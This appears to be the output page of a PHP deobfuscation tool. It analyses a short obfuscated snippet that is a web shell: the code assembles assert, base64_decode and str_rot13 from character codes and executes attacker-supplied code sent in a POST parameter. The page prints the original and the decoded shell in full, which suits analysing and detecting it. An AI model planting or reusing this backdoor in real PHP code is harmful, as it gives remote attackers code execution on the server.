Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $wfff="\x61"."s"."s"."\x65"."\x72"."\x74";$fm="\x62"."a"."s"."\x65".chr(54).chr(52)...

Decoded Output download

<?php $wfff="a"."s"."s"."e"."r"."t";$fm="b"."a"."s"."e".chr(54).chr(52)."_"."d"."e".chr(99)."o"."d".chr(101);$rpr="s".chr(116)."r"."_"."r".chr(111)."t".chr(49).chr(51);@$wfff(@$fm(@$rpr($_POST["d"."a"."t".chr(97)])));die(); ?>

Did this file decode correctly?

Original Code

<?php $wfff="\x61"."s"."s"."\x65"."\x72"."\x74";$fm="\x62"."a"."s"."\x65".chr(54).chr(52)."\x5f"."d"."\x65".chr(99)."\x6f"."d".chr(101);$rpr="\x73".chr(116)."\x72"."_"."\x72".chr(111)."\x74".chr(49).chr(51);@$wfff(@$fm(@$rpr($_POST["d"."\x61"."t".chr(97)])));die(); ?>

Function Calls

chr 9
str_rot13 1

Variables

$fm base64_decode
$rpr str_rot13
$wfff assert

Stats

MD5 169712b85e599ed127401f7540383817
Eval Count 0
Decode Time 102 ms